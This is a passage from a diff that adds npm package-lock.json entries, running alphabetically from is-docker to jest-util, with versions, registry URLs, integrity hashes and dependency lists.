"is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/is-docker": { + "version": "2.2.1", + "resolved": 
"https://registry.npmjs.org/is-docker/-/is-docker-2.2.1.tgz", + "integrity": "sha512-F+i2BKsFrH66iaUFc0woD8sLy8getkwTwtOBjvs56Cx4CgJDeKQeqfz8wAYiSb8JOprWhHH5p77PbmYCvvUuXQ==", + "bin": { + "is-docker": "cli.js" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-equal": { + "version": "1.7.0", + "resolved": "https://registry.npmjs.org/is-equal/-/is-equal-1.7.0.tgz", + "integrity": "sha512-hErktGR9jmoYXNWlbrwGjc8eHh09mbY6TWSTTFtnMcKaCuSMN8z+Ni5ma/8mkbVpe4CbB7V6kN1MkCg9bCx5bA==", + "dev": true, + "dependencies": { + "es-get-iterator": "^1.1.3", + "es-to-primitive": "^1.2.1", + "functions-have-names": "^1.2.3", + "has-bigints": "^1.0.2", + "has-symbols": "^1.0.3", + "hasown": "^2.0.0", + "is-arrow-function": "^2.0.3", + "is-bigint": "^1.0.4", + "is-boolean-object": "^1.1.2", + "is-callable": "^1.2.7", + "is-date-object": "^1.0.5", + "is-generator-function": "^1.0.10", + "is-number-object": "^1.0.7", + "is-regex": "^1.1.4", + "is-string": "^1.0.7", + "is-symbol": "^1.0.4", + "isarray": "^2.0.5", + "object-inspect": "^1.13.1", + "object.entries": "^1.1.7", + "object.getprototypeof": "^1.0.5", + "which-boxed-primitive": "^1.0.2", + "which-collection": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-expression": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/is-expression/-/is-expression-4.0.0.tgz", + "integrity": "sha512-zMIXX63sxzG3XrkHkrAPvm/OVZVSCPNkwMHU8oTX7/U3AL78I0QXCEICXUM13BIa8TYGZ68PiTKfQz3yaTNr4A==", + "dependencies": { + "acorn": "^7.1.1", + "object-assign": "^4.1.1" + } + }, + "node_modules/is-extendable": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-1.0.1.tgz", + "integrity": "sha512-arnXMxT1hhoKo9k1LZdmlNyJdDDfy2v0fXjFlmok4+i8ul/6WlbVge9bhM74OpNPQPMGUToDtz+KXa1PneJxOA==", + "dev": true, + "dependencies": { + "is-plain-object": "^2.0.4" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-extglob": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", + "integrity": "sha1-qIwCU1eR8C7TfHahueqXc8gz+MI=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-finalizationregistry": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-finalizationregistry/-/is-finalizationregistry-1.0.2.tgz", + "integrity": "sha512-0by5vtUJs8iFQb5TYUHHPudOR+qXYIMKtiUzvLIZITZUjknFmziyBJuLhVRc+Ds0dREFlskDNJKYIdIzu/9pfw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-fullwidth-code-point": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", + "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-generator-function": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/is-generator-function/-/is-generator-function-1.0.10.tgz", + "integrity": "sha512-jsEjy9l3yiXEQ+PsXdmBwEPcOxaXWLspKdplFUVI9vq1iZgIekeC0L167qeu86czQaxed3q/Uzuw0swL0irL8A==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-glob": { + "version": "4.0.3", + "resolved": 
"https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", + "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==", + "dependencies": { + "is-extglob": "^2.1.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-inside-container": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/is-inside-container/-/is-inside-container-1.0.0.tgz", + "integrity": "sha512-KIYLCCJghfHZxqjYBE7rEy0OBuTd5xCHS7tHVgvCLkx7StIoaxwNW3hCALgEUjFfeRk+MG/Qxmp/vtETEF3tRA==", + "dev": true, + "license": "MIT", + "dependencies": { + "is-docker": "^3.0.0" + }, + "bin": { + "is-inside-container": "cli.js" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-inside-container/node_modules/is-docker": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-docker/-/is-docker-3.0.0.tgz", + "integrity": "sha512-eljcgEDlEns/7AXFosB5K/2nCM4P7FQPkGc/DWLy5rmFEWvZayGrik1d9/QIY5nJ4f9YsVvBkA6kJpHn9rISdQ==", + "dev": true, + "license": "MIT", + "bin": { + "is-docker": "cli.js" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-installed-globally": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/is-installed-globally/-/is-installed-globally-0.4.0.tgz", + "integrity": "sha512-iwGqO3J21aaSkC7jWnHP/difazwS7SFeIqxv6wEtLU8Y5KlzFTjyqcSIT0d8s4+dDhKytsk9PJZ2BkS5eZwQRQ==", + "dev": true, + "dependencies": { + "global-dirs": "^3.0.0", + "is-path-inside": "^3.0.2" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-ip": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/is-ip/-/is-ip-2.0.0.tgz", + "integrity": "sha1-aO6gfooKCpTC0IDdZ0xzGrKkYas=", + "dev": true, + "dependencies": { + "ip-regex": "^2.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/is-map": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-map/-/is-map-2.0.2.tgz", + "integrity": "sha512-cOZFQQozTha1f4MxLFzlgKYPTyj26picdZTx82hbc/Xf4K/tZOOXSCkMvU4pKioRXGDLJRn0GM7Upe7kR721yg==", + "dev": true, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-nan": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/is-nan/-/is-nan-1.3.2.tgz", + "integrity": "sha512-E+zBKpQ2t6MEo1VsonYmluk9NxGrbzpeeLC2xIViuO2EjU2xsXsBPwTr3Ykv9l08UYEVEdWeRZNouaZqF6RN0w==", + "dependencies": { + "call-bind": "^1.0.0", + "define-properties": "^1.1.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-negated-glob": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/is-negated-glob/-/is-negated-glob-1.0.0.tgz", + "integrity": "sha512-czXVVn/QEmgvej1f50BZ648vUI+em0xqMq2Sn+QncCLN4zj1UAxlT+kw/6ggQTOaZPd1HqKQGEqbpQVtJucWug==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-negative-zero": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/is-negative-zero/-/is-negative-zero-2.0.3.tgz", + "integrity": "sha512-5KoIu2Ngpyek75jXodFvnafB6DJgr3u8uuK0LEZJjrU19DrMD3EVERaR8sjz8CCGgpZvxPl9SuE1GMVPFHx1mw==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-network-error": { + "version": "1.0.1", + 
"resolved": "https://registry.npmjs.org/is-network-error/-/is-network-error-1.0.1.tgz", + "integrity": "sha512-OwQXkwBJeESyhFw+OumbJVD58BFBJJI5OM5S1+eyrDKlgDZPX2XNT5gXS56GSD3NPbbwUuMlR1Q71SRp5SobuQ==", + "dev": true, + "engines": { + "node": ">=16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "engines": { + "node": ">=0.12.0" + } + }, + "node_modules/is-number-object": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/is-number-object/-/is-number-object-1.0.7.tgz", + "integrity": "sha512-k1U0IRzLMo7ZlYIfzRu23Oh6MiIFasgpb9X76eqfFZAqwH44UI4KTBvBYIZ1dSL9ZzChTB9ShHfLkR4pdW5krQ==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-obj": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/is-obj/-/is-obj-2.0.0.tgz", + "integrity": "sha512-drqDG3cbczxxEJRoOXcOjtdp1J/lyp1mNn0xaznRs8+muBhgQcrnbspox5X5fOw0HnMnbfDzvnEMEtqDEJEo8w==", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-path-inside": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/is-path-inside/-/is-path-inside-3.0.3.tgz", + "integrity": "sha512-Fd4gABb+ycGAmKou8eMftCupSir5lRxqf4aD/vd0cD2qc4HL07OjCeuHMr8Ro4CoMaeCKDB0/ECBOVWjTwUvPQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-plain-obj": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/is-plain-obj/-/is-plain-obj-2.1.0.tgz", + "integrity": "sha512-YWnfyRwxL/+SsrWYfOpUtz5b3YD+nyfkHvjbcanzk8zgyO4ASD67uVMRt8k5bM4lLMDnXfriRhOpemw+NfT1eA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-plain-object": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-2.0.4.tgz", + "integrity": "sha512-h5PpgXkWitc38BBMYawTYMWJHFZJVnBquFE57xFpjB8pJFiF6gZ+bU+WyI/yqXiFR5mdLsgYNaPe8uao6Uv9Og==", + "dev": true, + "dependencies": { + "isobject": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-potential-custom-element-name": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-potential-custom-element-name/-/is-potential-custom-element-name-1.0.1.tgz", + "integrity": "sha512-bCYeRA2rVibKZd+s2625gGnGF/t7DSqDs4dP7CrLA1m7jKWz6pps0LpYLJN8Q64HtmPKJ1hrN3nzPNKFEKOUiQ==", + "dev": true + }, + "node_modules/is-promise": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/is-promise/-/is-promise-2.2.2.tgz", + "integrity": "sha512-+lP4/6lKUBfQjZ2pdxThZvLUAafmZb8OAxFb8XXtiQmS35INgr85hdOGoEs124ez1FCnZJt6jau/T+alh58QFQ==" + }, + "node_modules/is-regex": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/is-regex/-/is-regex-1.1.4.tgz", + "integrity": "sha512-kvRdxDsxZjhzUX07ZnLydzS1TU/TJlTUHHY4YLL87e37oUA49DfkLqgy+VjFocowy29cKvcSiu+kIv728jTTVg==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-set": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-set/-/is-set-2.0.2.tgz", + "integrity": "sha512-+2cnTEZeY5z/iXGbLhPrOAaK/Mau5k5eXq9j14CpRTftq0pAJu2MwVRSZhyZWBzx3o6X795Lz6Bpb6R0GKf37g==", + 
"dev": true, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-shallow-equal": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-shallow-equal/-/is-shallow-equal-1.0.1.tgz", + "integrity": "sha512-lq5RvK+85Hs5J3p4oA4256M1FEffzmI533ikeDHvJd42nouRRx5wBzt36JuviiGe5dIPyHON/d0/Up+PBo6XkQ==", + "dev": true + }, + "node_modules/is-shared-array-buffer": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/is-shared-array-buffer/-/is-shared-array-buffer-1.0.3.tgz", + "integrity": "sha512-nA2hv5XIhLR3uVzDDfCIknerhx8XUKnstuOERPNNIinXG7v9u+ohXF67vxm4TPTEPU6lm61ZkwP3c9PCB97rhg==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-stream": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", + "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-stream-ended": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/is-stream-ended/-/is-stream-ended-0.1.4.tgz", + "integrity": "sha512-xj0XPvmr7bQFTvirqnFr50o0hQIh6ZItDqloxt5aJrR4NQsYeSsyFQERYGCAzfindAcnKjINnwEEgLx4IqVzQw==" + }, + "node_modules/is-string": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/is-string/-/is-string-1.0.7.tgz", + "integrity": "sha512-tE2UXzivje6ofPW7l23cjDOMa09gb7xlAqG6jG5ej6uPV32TlWP3NKPigtaGeHNu9fohccRYvIiZMfOOnOYUtg==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-symbol": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/is-symbol/-/is-symbol-1.0.4.tgz", + "integrity": "sha512-C/CPBqKWnvdcxqIARxyOh4v1UUEOCHpgDa0WYgpKDFMszcrPcffg5uhwSgPCLD2WWxmq6isisz87tzT01tuGhg==", + "dependencies": { + "has-symbols": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-typed-array": { + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/is-typed-array/-/is-typed-array-1.1.13.tgz", + "integrity": "sha512-uZ25/bUAlUY5fR4OKT4rZQEBrzQWYV9ZJYGGsUmEJ6thodVJ1HX64ePQ6Z0qPWP+m+Uq6e9UugrE38jeYsDSMw==", + "license": "MIT", + "dependencies": { + "which-typed-array": "^1.1.14" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-typedarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", + "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" + }, + "node_modules/is-unicode-supported": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/is-unicode-supported/-/is-unicode-supported-0.1.0.tgz", + "integrity": "sha512-knxG2q4UC3u8stRGyAVJCOdxFmv5DZiRcdlIaAQXAbSfJya+OhopNotLQrstBhququ4ZpuKbDc/8S6mgXgPFPw==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-valid-glob": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/is-valid-glob/-/is-valid-glob-1.0.0.tgz", + "integrity": "sha512-AhiROmoEFDSsjx8hW+5sGwgKVIORcXnrlAx/R0ZSeaPw70Vw0CqkGBBhHGL58Uox2eXnU1AnvXJl1XlyedO5bA==", + 
"dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-valid-hostname": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-valid-hostname/-/is-valid-hostname-1.0.2.tgz", + "integrity": "sha512-X/kiF3Xndj6WI7l/yLyzR7V1IbQd6L4S4cewSL0fRciemPmHbaXIKR2qtf+zseH+lbMG0vFp4HvCUe7amGZVhw==" + }, + "node_modules/is-weakmap": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/is-weakmap/-/is-weakmap-2.0.1.tgz", + "integrity": "sha512-NSBR4kH5oVj1Uwvv970ruUkCV7O1mzgVFO4/rev2cLRda9Tm9HrL70ZPut4rOHgY0FNrUu9BCbXA2sdQ+x0chA==", + "dev": true, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-weakref": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-weakref/-/is-weakref-1.0.2.tgz", + "integrity": "sha512-qctsuLZmIQ0+vSSMfoVvyFe2+GSEvnmZ2ezTup1SBse9+twCCeial6EEi3Nc2KFcf6+qz2FBPnjXsk8xhKSaPQ==", + "dependencies": { + "call-bind": "^1.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-weakset": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-weakset/-/is-weakset-2.0.2.tgz", + "integrity": "sha512-t2yVvttHkQktwnNNmBQ98AhENLdPUTDTE21uPqAQ0ARwQfGeQKRVS0NNurH7bTf7RrvcVn1OOge45CnBeHCSmg==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "get-intrinsic": "^1.1.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-what": { + "version": "3.14.1", + "resolved": "https://registry.npmjs.org/is-what/-/is-what-3.14.1.tgz", + "integrity": "sha512-sNxgpk9793nzSs7bA6JQJGeIuRBQhAaNGG77kzYQgMkrID+lS6SlK07K5LaptscDlSaIgH+GPFzf+d75FVxozA==", + "dev": true + }, + "node_modules/is-windows": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-windows/-/is-windows-1.0.2.tgz", + "integrity": "sha512-eXK1UInq2bPmjyX6e3VHIzMLobc4J94i4AWn+Hpq3OU5KkrRC96OAcR3PRJ/pGu6m8TRnBHP9dkXQVsT/COVIA==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-wsl": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/is-wsl/-/is-wsl-2.2.0.tgz", + "integrity": "sha512-fKzAra0rGJUUBwGBgNkHZuToZcn+TtXHpeCgmkMJMMYx1sQDYaCSyjJBSCa2nH1DGm7s3n1oBnohoVTBaN7Lww==", + "dependencies": { + "is-docker": "^2.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/isarray": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-2.0.5.tgz", + "integrity": "sha512-xHjhDr3cNBK0BzdUJSPXZntQUx/mwMS5Rw4A7lPJ90XGAO6ISP/ePDNuo0vhqOZU+UD5JoodwCAAoZQd3FeAKw==" + }, + "node_modules/isexe": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", + "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=" + }, + "node_modules/isobject": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/isobject/-/isobject-3.0.1.tgz", + "integrity": "sha1-TkMekrEalzFjaqH5yNHMvP2reN8=", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/isomorphic-git": { + "version": "1.29.0", + "resolved": "https://registry.npmjs.org/isomorphic-git/-/isomorphic-git-1.29.0.tgz", + "integrity": "sha512-zWGqk8901cicvVEhVpN76AwKrS/TzHak2NQCtNXIAavpMIy/yqh+d/JtC9A8AUKZAauUdOyEWKI29tuCLAL+Zg==", + "dev": true, + "license": "MIT", + "dependencies": { + "async-lock": "^1.4.1", + "clean-git-ref": "^2.0.1", + "crc-32": "^1.2.0", + "diff3": "0.0.3", + "ignore": "^5.1.4", + "minimisted": "^2.0.0", + "pako": "^1.0.10", + "path-browserify": "^1.0.1", + "pify": "^4.0.1", + "readable-stream": "^3.4.0", + "sha.js": "^2.4.9", + "simple-get": 
"^4.0.1" + }, + "bin": { + "isogit": "cli.cjs" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/isomorphic-git/node_modules/pify": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/pify/-/pify-4.0.1.tgz", + "integrity": "sha512-uB80kBFb/tfd68bVleG9T5GGsGPjJrLAUpR5PZIrhBnIaRTQRjqdJSsIKkOP6OAIFbj7GOrcudc5pNjZ+geV2g==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/isomorphic-git/node_modules/simple-get": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/simple-get/-/simple-get-4.0.1.tgz", + "integrity": "sha512-brv7p5WgH0jmQJr1ZDDfKDOSeWWg+OVypG99A/5vYGPqJ6pxiaHLy8nxtFjBA7oMa01ebA9gfh1uMCFqOuXxvA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT", + "dependencies": { + "decompress-response": "^6.0.0", + "once": "^1.3.1", + "simple-concat": "^1.0.0" + } + }, + "node_modules/isomorphic-textencoder": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/isomorphic-textencoder/-/isomorphic-textencoder-1.0.1.tgz", + "integrity": "sha512-676hESgHullDdHDsj469hr+7t3i/neBKU9J7q1T4RHaWwLAsaQnywC0D1dIUId0YZ+JtVrShzuBk1soo0+GVcQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-text-encoding": "^1.0.0" + } + }, + "node_modules/isstream": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", + "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" + }, + "node_modules/istanbul-lib-coverage": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", + "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/istanbul-lib-report": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", + "dev": true, + "dependencies": { + "istanbul-lib-coverage": "^3.0.0", + "make-dir": "^3.0.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/istanbul-lib-report/node_modules/make-dir": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", + "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", + "dev": true, + "dependencies": { + "semver": "^6.0.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/istanbul-lib-report/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/istanbul-reports": { + "version": "3.1.5", + "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", + "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", + "dev": true, + "dependencies": { + 
"html-escaper": "^2.0.0", + "istanbul-lib-report": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/jackspeak": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", + "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", + "dev": true, + "license": "BlueOak-1.0.0", + "dependencies": { + "@isaacs/cliui": "^8.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + }, + "optionalDependencies": { + "@pkgjs/parseargs": "^0.11.0" + } + }, + "node_modules/jaeger-client": { + "version": "3.19.0", + "resolved": "https://registry.npmjs.org/jaeger-client/-/jaeger-client-3.19.0.tgz", + "integrity": "sha512-M0c7cKHmdyEUtjemnJyx/y9uX16XHocL46yQvyqDlPdvAcwPDbHrIbKjQdBqtiE4apQ/9dmr+ZLJYYPGnurgpw==", + "dependencies": { + "node-int64": "^0.4.0", + "opentracing": "^0.14.4", + "thriftrw": "^3.5.0", + "uuid": "^8.3.2", + "xorshift": "^1.1.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/jaeger-client/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/jake": { + "version": "10.8.5", + "resolved": "https://registry.npmjs.org/jake/-/jake-10.8.5.tgz", + "integrity": "sha512-sVpxYeuAhWt0OTWITwT98oyV0GsXyMlXCF+3L1SuafBVUIr/uILGRB+NqwkzhgXKvoJpDIpQvqkUALgdmQsQxw==", + "dependencies": { + "async": "^3.2.3", + "chalk": "^4.0.2", + "filelist": "^1.0.1", + "minimatch": "^3.0.4" + }, + "bin": { + "jake": "bin/cli.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/jake/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/jake/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/jake/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/jest-util": { + "version": "29.7.0", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", + "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", + "dev": true, + "dependencies": { + "@jest/types": "^29.6.3", + "@types/node": "*", + "chalk": "^4.0.0", + "ci-info": "^3.2.0", + "graceful-fs": "^4.2.9", + "picomatch": "^2.2.3" + }, + "engines": { + "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + } + }, + "node_modules/jest-util/node_modules/ansi-styles": { + "version": 
